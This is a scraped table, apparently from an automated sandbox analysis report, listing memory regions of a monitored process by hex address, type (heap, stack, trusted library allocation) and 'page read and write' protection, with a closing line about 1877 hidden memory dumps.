heap
|
page read and write
|
||
21F12CFF000
|
trusted library allocation
|
page read and write
|
||
21F12CF7000
|
trusted library allocation
|
page read and write
|
||
AD576FE000
|
stack
|
page read and write
|
||
21F2A40A000
|
heap
|
page read and write
|
||
54DE000
|
stack
|
page read and write
|
||
1ADB52D3000
|
trusted library allocation
|
page read and write
|
||
19457D00000
|
heap
|
page read and write
|
||
21F12D97000
|
trusted library allocation
|
page read and write
|
||
21F2A63C000
|
heap
|
page read and write
|
||
4D9E000
|
stack
|
page read and write
|
||
19457EA0000
|
trusted library allocation
|
page read and write
|
||
21F12E71000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
21F12D89000
|
trusted library allocation
|
page read and write
|
||
21F2204D000
|
trusted library allocation
|
page read and write
|
||
1E45B751000
|
trusted library allocation
|
page read and write
|
||
21F29B87000
|
heap
|
page read and write
|
||
1ADB5099000
|
trusted library allocation
|
page read and write
|
||
2898B5A1000
|
trusted library allocation
|
page read and write
|
||
21F12CF5000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
21F12DF1000
|
trusted library allocation
|
page read and write
|
||
21F2C036000
|
heap
|
page read and write
|
||
65E000
|
heap
|
page read and write
|
||
21F12E03000
|
trusted library allocation
|
page read and write
|
||
21F21AAD000
|
trusted library allocation
|
page read and write
|
||
21F12E49000
|
trusted library allocation
|
page read and write
|
||
83EB8FE000
|
stack
|
page read and write
|
||
1B2B1430000
|
heap
|
page read and write
|
||
21F12CA9000
|
trusted library allocation
|
page read and write
|
||
2898B5A3000
|
trusted library allocation
|
page read and write
|
||
21F12D51000
|
trusted library allocation
|
page read and write
|
||
23F68030000
|
heap
|
page read and write
|
||
AD577FE000
|
stack
|
page read and write
|
||
1E46274C000
|
heap
|
page read and write
|
||
29974C50000
|
heap
|
page read and write
|
||
1E45B551000
|
trusted library allocation
|
page read and write
|
||
1E44A0DB000
|
trusted library allocation
|
page read and write
|
||
1E39F230000
|
heap
|
page read and write
|
||
2094780B000
|
heap
|
page read and write
|
There are 1877 hidden memdumps, click here to show them.